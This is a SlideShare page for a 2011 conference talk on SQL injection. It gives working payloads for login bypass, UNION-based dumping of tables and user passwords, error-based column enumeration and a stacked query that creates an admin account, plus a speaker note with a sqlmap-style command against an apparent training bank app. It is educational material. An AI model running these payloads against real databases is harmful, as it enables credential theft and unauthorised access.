SlideShare ist ein Scribd-Unternehmen logo

How did i steal your database CSCamp2011

Als PPTX, PDF herunterladen
Mostafa Siraj
Mostafa Siraj
Technologie
1 von 72
How Did I Steal Your Database Mostafa Siraj Application Security Expert
DISCLAIMER Hacking websites is ILLEGAL This presentation is meant for educational purposes ONLY Only use this stuff on YOUR website and YOUR account
Nearly all applications rely on a Datastore
What is Database A Collection of Tables (Users, Orders, Countries,..etc) The tables are a collection of columns/rows
What is SQL A query language that allows interacting with the database SQL can Retrieve data from the database Insert new records in the database Delete records from the database Update records in the database
SQL Queries To get all data about Username elprince: SELECTUsername,Password, First_Name,Last_Name, Password FROM Users WHERE Username=‘elprince’ Gives a result:
FACT Amongst Codd's rules for a Relational Database: Metadata must be stored in the database just as regular data is
SQL Injection is a technique where an attacker creates or alters existing SQL commands Expose hidden data (e.g. steal all the records from the tables) Override the data (e.g. Administrators password) Execute dangerous system level commands on the database host
SQL Injection Login Example SELECT * FROM Users WHERE Username=‘username’AND Password=‘password’ If the user entered Elprince, Elprince123the query will be SELECT * FROM Users WHERE Username=‘Elprince’AND Password=‘Elprince123’
SQL Injection Ex Cont Suppose the User entered ‘ OR 1=1--, 123 the query will be SELECT * FROM Users WHERE Username=‘‘ OR 1=1--’ AND Password=‘123’ -- comments everything afterwards, so the query will be SELECT * FROM Users WHERE Username=‘‘ OR 1=1--
This is not enough You can enhance the injection to login with the administrator account Enter ‘ or 1=1 ORDER BY 1--, abc the query will be SELECT * FROM Users WHERE Username=‘‘ OR 1=1 ORDER BY 1--’ AND Password=‘123’
Finding SQL Injection Bugs Submit single quotation mark and observe the result Submit two single quotations and observe the result
Finding SQL Injection Bugs For multistate processes, complete all the states before observing the results For search fields try using the wildcard character %
Finding SQL Injection Bugs For numeric data, if the original value was 2 try submitting 1+1 or 3-1 If successful try using SQL-specific keywords, e.g. 67-ASCII(‘A’) If single quotes are filtered try 51-ASCII(1) [note ASCII(1)=49]
Identify the database engine The error messages will let us know the DB engine We can guess the DB based on OS or Web Server (e.g. LAMP: Linux+Apache+PHP+….)
Identify the database engine Use specific characters or commands: String concatenation in different DB engines : ‘||’FOO : ‘+’FOO : ‘‘FOO [note the space btw the 2 quotes]
Identify User privileges ‘ and 1 in (SELECTuser) -- ‘; IF user=‘admin’ WAITFOR DELAY ‘0:0:10’--
Injection in Search Fields 35
Entering Normal Input
Search Results
Trying Single Quote
I receive this error Error states that it’s
Suppose I still don’t know the DB engine, Is it Note: string concatenation in is +
I’m having an error, it’s not
Is it Note: string concatenation in Oracle is ||
Different error, still not
Is it Note: string concatenation in MySQL is blank space
It’s
The query in the backend is something like that SELECT …,…,…,…,… FROM …. WHERE ….=…. AND ….!=….. OR ….. OR ….LIKE…. A possible location for my input
The Strategy Get number of items after the SELECT statement How many items are here SELECT …,…,…,…,… FROM …. WHERE ….=…. AND ….!=….. OR …..>……
The Strategy 2. Identify the location of the STRINGS in the SELECT Statement Which of those are strings SELECT …,…,…,…,… FROM …. WHERE ….=…. AND ….!=….. OR …..>……
The Strategy 3. Get the Structure of the database SELECT …,…,…,…,… FROM …. WHERE …. UNION SELECT ….,TableNames,….,….,… FROM DatabaseStructure --=…. AND ….!=….. OR …..>……
The Strategy 4. Get the data from the database SELECT …,…,…,…,… FROM …. WHERE …. UNION SELECT ….,Usernames,….,….,… FROM Users --=…. AND ….!=….. OR …..>……
The Strategy Get number of items after the SELECT statement Identify the location of the STRINGS in the SELECT Statement 3. Get the Structure of the database 4. Get the data from the database
1. Get number of items after the SELECT statement
Error
Try another number
Result Why the results are less?
Try another number
Error, it’s not 8
Let’s try 7
Result How many columns do we have in the SELECT statement
The Strategy Get number of items after the SELECT statement Identify the location of the STRINGS in the SELECT Statement 3. Get the Structure of the database 4. Get the data from the database
2. Identify the location of the STRINGS in the SELECT Statement 1234') UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#
Result
Get the Strings and the locations 1234') UNION SELECT NULL,'ABC','DEF','IJK','LMN',NULL,NULL#
Result
The Strategy Get number of items after the SELECT statement Identify the location of the STRINGS in the SELECT Statement 3. Get the Structure of the database 4. Get the data from the database
3. Get the Structure of the database 1234') UNION SELECTNULL,NULL,NULL,table_name,NULL,NULL,NULLFROMinformation_schema.tables#
Result
The Strategy Get number of items after the SELECT statement Identify the location of the STRINGS in the SELECT Statement 3. Get the Structure of the database 4. Get the data from the database
Next Queries 1234') UNION SELECT NULL,NULL,NULL,column_name,NULL,NULL,NULLFROMinformation_schema.columns where table_name=‘USERS'# 1234') UNION SELECT NULL,NULL,NULL,username,password,null,null FROM users WHERE id<100# ……. Continue till you get all the tables
The Strategy Get number of items after the SELECT statement Identify the location of the STRINGS in the SELECT Statement 3. Get the Structure of the database 4. Get the data from the database
Injection with errors
Gives me an Error
Getting version ' and 1 in (SELECT @@version)--
Gives me this error
Getting Column names
I get this Error
Getting next column name ' group by login.firstname having 1=1--
I get this error
Again ' group by login.firstname, login.surname having 1=1--
Error reveals new column name
Again ' group by login.firstname, login.surname,login.username having 1=1--
New column name
Continue…
Continue…
Continue… After getting all of the columns I found a field called IsAdmin-that’s my goal - Putting the following query creates an admin account on the application ‘; INSERT INTO Login (username,pwd,IsAdmin,……) VALUES (‘Administrator’,’******’,TRUE,…..)
Not all Injections generate errors
DEMOSQLMap
You Were GREAT Audience
Thank You @mostafasiraj Mostafa Siraj

Empfohlen

Sql Injection Tutorial!
Sql Injection Tutorial!Sql Injection Tutorial!
Sql Injection Tutorial!
ralphmigcute
 
TAO Fayan_Report on Top 10 data mining algorithms applications with R
TAO Fayan_Report on Top 10 data mining algorithms applications with RTAO Fayan_Report on Top 10 data mining algorithms applications with R
TAO Fayan_Report on Top 10 data mining algorithms applications with R
Fayan TAO
 
Lab2 ddl commands
Lab2 ddl commandsLab2 ddl commands
Lab2 ddl commands
Balqees Al.Mubarak
 
IR SQLite Session #1
IR SQLite Session #1IR SQLite Session #1
IR SQLite Session #1
InfoRepos Technologies
 
Sql alias
Sql aliasSql alias
Sql alias
Vivek Singh
 
MS SQL Database basic
MS SQL Database basicMS SQL Database basic
MS SQL Database basic
wali1195189
 
Dev Concepts: Data Structures and Algorithms
Dev Concepts: Data Structures and AlgorithmsDev Concepts: Data Structures and Algorithms
Dev Concepts: Data Structures and Algorithms
Svetlin Nakov
 
Recursive Query Throwdown
Recursive Query ThrowdownRecursive Query Throwdown
Recursive Query Throwdown
Karwin Software Solutions LLC
 

Empfohlen

Sql Injection Tutorial!
Sql Injection Tutorial!Sql Injection Tutorial!
Sql Injection Tutorial!
ralphmigcute
 
TAO Fayan_Report on Top 10 data mining algorithms applications with R
TAO Fayan_Report on Top 10 data mining algorithms applications with RTAO Fayan_Report on Top 10 data mining algorithms applications with R
TAO Fayan_Report on Top 10 data mining algorithms applications with R
Fayan TAO
 
Lab2 ddl commands
Lab2 ddl commandsLab2 ddl commands
Lab2 ddl commands
Balqees Al.Mubarak
 
IR SQLite Session #1
IR SQLite Session #1IR SQLite Session #1
IR SQLite Session #1
InfoRepos Technologies
 
Sql alias
Sql aliasSql alias
Sql alias
Vivek Singh
 
MS SQL Database basic
MS SQL Database basicMS SQL Database basic
MS SQL Database basic
wali1195189
 
Dev Concepts: Data Structures and Algorithms
Dev Concepts: Data Structures and AlgorithmsDev Concepts: Data Structures and Algorithms
Dev Concepts: Data Structures and Algorithms
Svetlin Nakov
 
Recursive Query Throwdown
Recursive Query ThrowdownRecursive Query Throwdown
Recursive Query Throwdown
Karwin Software Solutions LLC
 
Hacking XPATH 2.0
Hacking XPATH 2.0Hacking XPATH 2.0
Hacking XPATH 2.0
michelemanzotti
 
Namespace and methods
Namespace and methodsNamespace and methods
Namespace and methods
JayanthiNeelampalli
 
Xpath injection in XML databases
Xpath injection in XML databasesXpath injection in XML databases
Xpath injection in XML databases
Triad Square InfoSec
 
Creating a database
Creating a databaseCreating a database
Creating a database
Rahul Gupta
 
ShmooCon 2009 - (Re)Playing(Blind)Sql
ShmooCon 2009 - (Re)Playing(Blind)SqlShmooCon 2009 - (Re)Playing(Blind)Sql
ShmooCon 2009 - (Re)Playing(Blind)Sql
Chema Alonso
 
Playing With (B)Sqli
Playing With (B)SqliPlaying With (B)Sqli
Playing With (B)Sqli
Chema Alonso
 
Sitecore 7: A developers quest to mastering unit testing
Sitecore 7: A developers quest to mastering unit testingSitecore 7: A developers quest to mastering unit testing
Sitecore 7: A developers quest to mastering unit testing
nonlinear creations
 
Asegúr@IT IV - Remote File Downloading
Asegúr@IT IV - Remote File DownloadingAsegúr@IT IV - Remote File Downloading
Asegúr@IT IV - Remote File Downloading
Chema Alonso
 
Java Collections | Collections Framework in Java | Java Tutorial For Beginner...
Java Collections | Collections Framework in Java | Java Tutorial For Beginner...Java Collections | Collections Framework in Java | Java Tutorial For Beginner...
Java Collections | Collections Framework in Java | Java Tutorial For Beginner...
Edureka!
 
บทที่4
บทที่4บทที่4
บทที่4
Waritsara Sonchan
 
Introduction to MySQL in PHP
Introduction to MySQL in PHPIntroduction to MySQL in PHP
Introduction to MySQL in PHP
hamsa nandhini
 
Sq linjection
Sq linjectionSq linjection
Sq linjection
Mahesh Gupta (DBATAG) - SQL Server Consultant
 
XML & XPath Injections
XML & XPath InjectionsXML & XPath Injections
XML & XPath Injections
AMol NAik
 
Generics. PECS
Generics. PECSGenerics. PECS
Generics. PECS
Uptech
 
ALL ABOUT SQL AND RDBMS
ALL ABOUT SQL AND RDBMSALL ABOUT SQL AND RDBMS
ALL ABOUT SQL AND RDBMS
gaurav koriya
 
plsql Les09
plsql Les09 plsql Les09
plsql Les09
sasa_eldoby
 
Sqlalchemy sqlの錬金術
Sqlalchemy sqlの錬金術Sqlalchemy sqlの錬金術
Sqlalchemy sqlの錬金術
Atsushi Odagiri
 
Apachepoitutorial
ApachepoitutorialApachepoitutorial
Apachepoitutorial
Srikrishna k
 
V18 alias-c
V18 alias-cV18 alias-c
V18 alias-c
Dhirendra Chauhan
 
Fluent api configuration
Fluent api configurationFluent api configuration
Fluent api configuration
Mehdi jannati
 
Chapter – 6 SQL Lab Tutorial.pdf
Chapter – 6 SQL Lab Tutorial.pdfChapter – 6 SQL Lab Tutorial.pdf
Chapter – 6 SQL Lab Tutorial.pdf
TamiratDejene1
 
Intro To TSQL - Unit 1
Intro To TSQL - Unit 1Intro To TSQL - Unit 1
Intro To TSQL - Unit 1
iccma
 

Weitere ähnliche Inhalte

Was ist angesagt?

Creating a database
Creating a databaseCreating a database
Creating a database
Rahul Gupta
 
Sitecore 7: A developers quest to mastering unit testing
Sitecore 7: A developers quest to mastering unit testingSitecore 7: A developers quest to mastering unit testing
Sitecore 7: A developers quest to mastering unit testing
nonlinear creations
 
Sqlalchemy sqlの錬金術
Sqlalchemy sqlの錬金術Sqlalchemy sqlの錬金術
Sqlalchemy sqlの錬金術
Atsushi Odagiri
 

Was ist angesagt? (20)

Hacking XPATH 2.0
Hacking XPATH 2.0Hacking XPATH 2.0
Hacking XPATH 2.0
 
Namespace and methods
Namespace and methodsNamespace and methods
Namespace and methods
 
Xpath injection in XML databases
Xpath injection in XML databasesXpath injection in XML databases
Xpath injection in XML databases
 
Creating a database
Creating a databaseCreating a database
Creating a database
 
ShmooCon 2009 - (Re)Playing(Blind)Sql
ShmooCon 2009 - (Re)Playing(Blind)SqlShmooCon 2009 - (Re)Playing(Blind)Sql
ShmooCon 2009 - (Re)Playing(Blind)Sql
 
Playing With (B)Sqli
Playing With (B)SqliPlaying With (B)Sqli
Playing With (B)Sqli
 
Sitecore 7: A developers quest to mastering unit testing
Sitecore 7: A developers quest to mastering unit testingSitecore 7: A developers quest to mastering unit testing
Sitecore 7: A developers quest to mastering unit testing
 
Asegúr@IT IV - Remote File Downloading
Asegúr@IT IV - Remote File DownloadingAsegúr@IT IV - Remote File Downloading
Asegúr@IT IV - Remote File Downloading
 
Java Collections | Collections Framework in Java | Java Tutorial For Beginner...
Java Collections | Collections Framework in Java | Java Tutorial For Beginner...Java Collections | Collections Framework in Java | Java Tutorial For Beginner...
Java Collections | Collections Framework in Java | Java Tutorial For Beginner...
 
บทที่4
บทที่4บทที่4
บทที่4
 
Introduction to MySQL in PHP
Introduction to MySQL in PHPIntroduction to MySQL in PHP
Introduction to MySQL in PHP
 
Sq linjection
Sq linjectionSq linjection
Sq linjection
 
XML & XPath Injections
XML & XPath InjectionsXML & XPath Injections
XML & XPath Injections
 
Generics. PECS
Generics. PECSGenerics. PECS
Generics. PECS
 
ALL ABOUT SQL AND RDBMS
ALL ABOUT SQL AND RDBMSALL ABOUT SQL AND RDBMS
ALL ABOUT SQL AND RDBMS
 
plsql Les09
plsql Les09 plsql Les09
plsql Les09
 
Sqlalchemy sqlの錬金術
Sqlalchemy sqlの錬金術Sqlalchemy sqlの錬金術
Sqlalchemy sqlの錬金術
 
Apachepoitutorial
ApachepoitutorialApachepoitutorial
Apachepoitutorial
 
V18 alias-c
V18 alias-cV18 alias-c
V18 alias-c
 
Fluent api configuration
Fluent api configurationFluent api configuration
Fluent api configuration
 

Ähnlich wie How did i steal your database CSCamp2011

Intro to tsql unit 1
Intro to tsql unit 1Intro to tsql unit 1
Intro to tsql unit 1
Syed Asrarali
 
Sql Injection Adv Owasp
Sql Injection Adv OwaspSql Injection Adv Owasp
Sql Injection Adv Owasp
Aung Khant
 
Advanced Sql Injection ENG
Advanced Sql Injection ENGAdvanced Sql Injection ENG
Advanced Sql Injection ENG
Dmitry Evteev
 
Database development coding standards
Database development coding standardsDatabase development coding standards
Database development coding standards
Alessandro Baratella
 

Ähnlich wie How did i steal your database CSCamp2011 (20)

Chapter – 6 SQL Lab Tutorial.pdf
Chapter – 6 SQL Lab Tutorial.pdfChapter – 6 SQL Lab Tutorial.pdf
Chapter – 6 SQL Lab Tutorial.pdf
 
Intro To TSQL - Unit 1
Intro To TSQL - Unit 1Intro To TSQL - Unit 1
Intro To TSQL - Unit 1
 
Intro to tsql unit 1
Intro to tsql unit 1Intro to tsql unit 1
Intro to tsql unit 1
 
Oracle notes
Oracle notesOracle notes
Oracle notes
 
Sql injection
Sql injectionSql injection
Sql injection
 
Hira
HiraHira
Hira
 
Sql injection
Sql injectionSql injection
Sql injection
 
Oracle Notes
Oracle NotesOracle Notes
Oracle Notes
 
My SQL Skills Killed the Server
My SQL Skills Killed the ServerMy SQL Skills Killed the Server
My SQL Skills Killed the Server
 
Sql killedserver
Sql killedserverSql killedserver
Sql killedserver
 
Advanced SQL Injection
Advanced SQL InjectionAdvanced SQL Injection
Advanced SQL Injection
 
Sql Injection Adv Owasp
Sql Injection Adv OwaspSql Injection Adv Owasp
Sql Injection Adv Owasp
 
Advanced Sql Injection ENG
Advanced Sql Injection ENGAdvanced Sql Injection ENG
Advanced Sql Injection ENG
 
3 database-jdbc(1)
3 database-jdbc(1)3 database-jdbc(1)
3 database-jdbc(1)
 
98765432345671223Intro-to-PostgreSQL.ppt
98765432345671223Intro-to-PostgreSQL.ppt98765432345671223Intro-to-PostgreSQL.ppt
98765432345671223Intro-to-PostgreSQL.ppt
 
Introduction to database
Introduction to databaseIntroduction to database
Introduction to database
 
Dbms sql-final
Dbms sql-finalDbms sql-final
Dbms sql-final
 
Sql Basics | Edureka
Sql Basics | EdurekaSql Basics | Edureka
Sql Basics | Edureka
 
Database development coding standards
Database development coding standardsDatabase development coding standards
Database development coding standards
 
Advanced Database Systems - Presentation 3.pptx
Advanced Database Systems - Presentation 3.pptxAdvanced Database Systems - Presentation 3.pptx
Advanced Database Systems - Presentation 3.pptx
 

Kürzlich hochgeladen

The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptx
Malak Abu Hammad
 
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Igalia
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
Safe Software
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
UK Journal
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?
Igalia
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
Delhi Call girls
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slide
vu2urc
 

Kürzlich hochgeladen (20)

GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day Presentation
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organization
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptx
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf
 
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed texts
 
Advantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your BusinessAdvantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your Business
 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slide
 

How did i steal your database CSCamp2011

  • 1. How Did I Steal Your Database Mostafa Siraj Application Security Expert
  • 2. DISCLAIMER Hacking websites is ILLEGAL This presentation is meant for educational purposes ONLY Only use this stuff on YOUR website and YOUR account
  • 3. Nearly all applications rely on a Datastore
  • 4. What is Database A Collection of Tables (Users, Orders, Countries,..etc) The tables are a collection of columns/rows
  • 5. What is SQL A query language that allows interacting with the database SQL can Retrieve data from the database Insert new records in the database Delete records from the database Update records in the database
  • 6. SQL Queries To get all data about Username elprince: SELECTUsername,Password, First_Name,Last_Name, Password FROM Users WHERE Username=‘elprince’ Gives a result:
  • 7. FACT Amongst Codd's rules for a Relational Database: Metadata must be stored in the database just as regular data is
  • 8. SQL Injection is a technique where an attacker creates or alters existing SQL commands Expose hidden data (e.g. steal all the records from the tables) Override the data (e.g. Administrators password) Execute dangerous system level commands on the database host
  • 9. SQL Injection Login Example SELECT * FROM Users WHERE Username=‘username’AND Password=‘password’ If the user entered Elprince, Elprince123the query will be SELECT * FROM Users WHERE Username=‘Elprince’AND Password=‘Elprince123’
  • 10. SQL Injection Ex Cont Suppose the User entered ‘ OR 1=1--, 123 the query will be SELECT * FROM Users WHERE Username=‘‘ OR 1=1--’ AND Password=‘123’ -- comments everything afterwards, so the query will be SELECT * FROM Users WHERE Username=‘‘ OR 1=1--
  • 11. This is not enough You can enhance the injection to login with the administrator account Enter ‘ or 1=1 ORDER BY 1--, abc the query will be SELECT * FROM Users WHERE Username=‘‘ OR 1=1 ORDER BY 1--’ AND Password=‘123’
  • 12. Finding SQL Injection Bugs Submit single quotation mark and observe the result Submit two single quotations and observe the result
  • 13. Finding SQL Injection Bugs For multistate processes, complete all the states before observing the results For search fields try using the wildcard character %
  • 14. Finding SQL Injection Bugs For numeric data, if the original value was 2 try submitting 1+1 or 3-1 If successful try using SQL-specific keywords, e.g. 67-ASCII(‘A’) If single quotes are filtered try 51-ASCII(1) [note ASCII(1)=49]
  • 15. Identify the database engine The error messages will let us know the DB engine We can guess the DB based on OS or Web Server (e.g. LAMP: Linux+Apache+PHP+….)
  • 16. Identify the database engine Use specific characters or commands: String concatenation in different DB engines : ‘||’FOO : ‘+’FOO : ‘‘FOO [note the space btw the 2 quotes]
  • 17. Identify User privileges ‘ and 1 in (SELECTuser) -- ‘; IF user=‘admin’ WAITFOR DELAY ‘0:0:10’--
  • 18. Injection in Search Fields 35
  • 22. I receive this error Error states that it’s
  • 23. Suppose I still don’t know the DB engine, Is it Note: string concatenation in is +
  • 24. I’m having an error, it’s not
  • 25. Is it Note: string concatenation in Oracle is ||
  • 27. Is it Note: string concatenation in MySQL is blank space
  • 29. The query in the backend is something like that SELECT …,…,…,…,… FROM …. WHERE ….=…. AND ….!=….. OR ….. OR ….LIKE…. A possible location for my input
  • 30. The Strategy Get number of items after the SELECT statement How many items are here SELECT …,…,…,…,… FROM …. WHERE ….=…. AND ….!=….. OR …..>……
  • 31. The Strategy 2. Identify the location of the STRINGS in the SELECT Statement Which of those are strings SELECT …,…,…,…,… FROM …. WHERE ….=…. AND ….!=….. OR …..>……
  • 32. The Strategy 3. Get the Structure of the database SELECT …,…,…,…,… FROM …. WHERE …. UNION SELECT ….,TableNames,….,….,… FROM DatabaseStructure --=…. AND ….!=….. OR …..>……
  • 33. The Strategy 4. Get the data from the database SELECT …,…,…,…,… FROM …. WHERE …. UNION SELECT ….,Usernames,….,….,… FROM Users --=…. AND ….!=….. OR …..>……
  • 34. The Strategy Get number of items after the SELECT statement Identify the location of the STRINGS in the SELECT Statement 3. Get the Structure of the database 4. Get the data from the database
  • 35. 1. Get number of items after the SELECT statement
  • 36. Error
  • 38. Result Why the results are less?
  • 42. Result How many columns do we have in the SELECT statement
  • 43. The Strategy Get number of items after the SELECT statement Identify the location of the STRINGS in the SELECT Statement 3. Get the Structure of the database 4. Get the data from the database
  • 44. 2. Identify the location of the STRINGS in the SELECT Statement 1234') UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#
  • 46. Get the Strings and the locations 1234') UNION SELECT NULL,'ABC','DEF','IJK','LMN',NULL,NULL#
  • 48. The Strategy Get number of items after the SELECT statement Identify the location of the STRINGS in the SELECT Statement 3. Get the Structure of the database 4. Get the data from the database
  • 49. 3. Get the Structure of the database 1234') UNION SELECTNULL,NULL,NULL,table_name,NULL,NULL,NULLFROMinformation_schema.tables#
  • 51. The Strategy Get number of items after the SELECT statement Identify the location of the STRINGS in the SELECT Statement 3. Get the Structure of the database 4. Get the data from the database
  • 52. Next Queries 1234') UNION SELECT NULL,NULL,NULL,column_name,NULL,NULL,NULLFROMinformation_schema.columns where table_name=‘USERS'# 1234') UNION SELECT NULL,NULL,NULL,username,password,null,null FROM users WHERE id<100# ……. Continue till you get all the tables
  • 53. The Strategy Get number of items after the SELECT statement Identify the location of the STRINGS in the SELECT Statement 3. Get the Structure of the database 4. Get the data from the database
  • 54. Injection with errors
  • 55. Gives me an Error
  • 56. Getting version ' and 1 in (SELECT @@version)--
  • 57. Gives me this error
  • 59. I get this Error
  • 60. Getting next column name ' group by login.firstname having 1=1--
  • 61. I get this error
  • 62. Again ' group by login.firstname, login.surname having 1=1--
  • 63. Error reveals new column name
  • 64. Again ' group by login.firstname, login.surname,login.username having 1=1--
  • 68. Continue… After getting all of the columns I found a field called IsAdmin-that’s my goal - Putting the following query creates an admin account on the application ‘; INSERT INTO Login (username,pwd,IsAdmin,……) VALUES (‘Administrator’,’******’,TRUE,…..)
  • 69. Not all Injections generate errors
  • 71. You Were GREAT Audience
  • 72. Thank You @mostafasiraj Mostafa Siraj

Hinweis der Redaktion

  1. -u &quot;http://rajpc/HacmeBank_v2_Website/aspx/Main.aspx?function=TransactionDetails&amp;account_no=5204320422040001&quot; --cookie &quot;ASP.NET_SessionId=fadqryjsmlb52y45hztq0pvc; CookieLoginAttempts=5; Admin=false&quot; -p account_no